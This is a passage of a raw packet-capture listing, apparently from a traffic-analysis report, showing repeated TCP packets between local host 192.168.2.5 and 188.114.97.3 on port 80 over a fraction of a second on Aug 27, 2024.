                              Aug 27, 2024 09:48:55.601351976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.601362944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.601373911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.601383924 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.601385117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.601396084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.601403952 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.601406097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.601419926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.601423979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.601444960 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.601470947 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.601991892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602004051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602015018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602025032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602042913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602054119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602063894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602065086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602077007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602086067 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602087975 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602099895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602111101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602119923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602135897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602140903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602148056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602159977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602169991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602179050 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602180958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602193117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602196932 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602205038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602214098 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602215052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602225065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602236032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602246046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602256060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602261066 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602271080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602283001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602283001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602296114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602307081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602318048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602318048 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602329969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602375984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602392912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602935076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602952957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602963924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602977037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602988005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.602989912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602997065 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.602998018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603008986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603018999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603024006 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603029013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603039980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603043079 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603053093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603064060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603075027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603080034 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603086948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603097916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603106022 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603108883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603118896 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603120089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603132010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603137970 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603142023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603153944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603163004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603183985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603564024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603574991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603584051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603594065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603605986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603615999 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603626013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603635073 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603637934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603648901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603660107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603671074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603672028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603682041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603688002 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603693008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603703976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603713989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603714943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603725910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603730917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603735924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603739977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603744984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603746891 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603749037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603754044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603759050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603764057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603774071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.603804111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.603857994 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604367971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604379892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604389906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604401112 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604412079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604415894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604424000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604434013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604439974 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604445934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604456902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604463100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604466915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604475021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604480028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604490042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604491949 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604506969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604518890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604518890 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604530096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604541063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604543924 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604553938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604564905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604576111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604576111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604585886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604598045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604598045 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604609013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604617119 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604620934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604631901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604640007 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604643106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604652882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604657888 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604664087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604675055 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604676008 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604685068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.604707003 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.604752064 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.605115891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.605125904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.605187893 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.640716076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.640727997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.640737057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.640750885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.640788078 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.640799046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.640815020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.640899897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.640909910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.640922070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.640932083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.640964985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.640964985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.640964985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.640985966 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.641060114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641071081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641083002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641093969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641104937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641114950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641115904 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.641139984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.641176939 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.641284943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641294956 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641305923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641318083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641329050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641331911 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.641340017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641351938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641355991 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.641361952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641376972 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.641377926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641407967 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.641511917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641521931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641532898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641541958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.641557932 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.641572952 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.657288074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657334089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657344103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657357931 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.657396078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657406092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657416105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657485008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657563925 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.657563925 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.657563925 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.657584906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657597065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657608032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657634020 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.657664061 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657675028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657684088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657696962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657706022 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.657732964 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.657898903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657910109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657919884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657932043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657943964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.657944918 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.657968998 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.657982111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658165932 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658176899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658186913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658196926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658209085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658219099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658226967 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658230066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658240080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658252001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658252001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658262968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658271074 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658283949 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658308029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658318996 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658319950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658366919 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658572912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658582926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658592939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658602953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658613920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658624887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658629894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658637047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658647060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658659935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658670902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658674002 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658682108 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658689976 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658694029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658704042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658710957 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658715010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658730030 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658732891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658762932 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.658948898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658958912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658968925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658979893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658991098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.658997059 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659002066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659014940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659024000 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659030914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659043074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659053087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659056902 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659065008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659075022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659085989 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659091949 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659096003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659106970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659117937 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659117937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659132004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659132957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659152985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659176111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659382105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659396887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659409046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659452915 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659521103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659532070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659565926 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659651041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659662008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659672022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659683943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659693956 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659706116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659709930 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659715891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659724951 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659727097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659739017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659749985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.659764051 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.659786940 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.667165041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.667207956 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.667217016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.667224884 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.667258024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.667268991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.667279005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.667280912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.667289972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.667316914 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.667337894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.667345047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.718944073 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.729460001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729486942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729497910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729541063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729552031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729566097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729578018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729589939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729686022 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.729686022 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.729691982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729702950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729717016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729728937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729741096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729753017 CEST6138380192.168.2.5188.114.97.3
